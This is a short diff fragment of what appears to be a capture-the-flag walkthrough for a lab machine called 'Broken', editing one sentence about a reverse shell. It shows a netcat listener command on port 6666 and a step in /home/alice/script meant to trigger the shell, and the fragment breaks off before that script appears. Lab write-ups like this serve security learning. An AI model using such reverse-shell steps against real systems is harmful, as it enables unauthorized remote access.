samiux/samiux.github.io/broken-2020-1.md

 nc -lvp 6666
 ```

 At Broken box at ```/home/alice/script```, do the following and wait for a minute.
-A reverse shell is launched at port 6666.
+A reverse shell is ported at port 6666.

 ```bash
 cd /home/alice/script